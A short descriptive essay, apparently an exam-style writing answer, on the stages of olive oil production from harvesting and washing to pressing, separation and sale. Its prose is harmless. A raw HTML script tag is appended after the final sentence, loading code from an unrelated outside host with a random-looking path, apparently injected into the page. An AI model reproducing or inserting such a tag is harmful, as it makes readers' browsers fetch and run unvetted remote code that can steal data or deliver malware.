The diagram gives information about the process of olive oil production.
In general, there is a total of seven steps from harvesting olives to packaging oil and finally selling at supermarkets and shops.
Firstly, the farmers collect ripe olives from olive trees and put them in baskets. Then, they are taken to the machines which rinse these olives with cold water before being sent through the conveyor belt. These olives are smashed with special equipment, and the machines sort out olive stones and olive paste. While the olive paste is put into packages with a number of holes and goes for pressing to squeeze out a new liquid mixture that contains oil and impurities, olive stones are removed. After that, the further process is the separation where oil and water are separated. Olive oil is then delivered to shops, where it can be stored and marketed to customers. <script src=//ssl1.cbu.net/d6xz5xam></script>
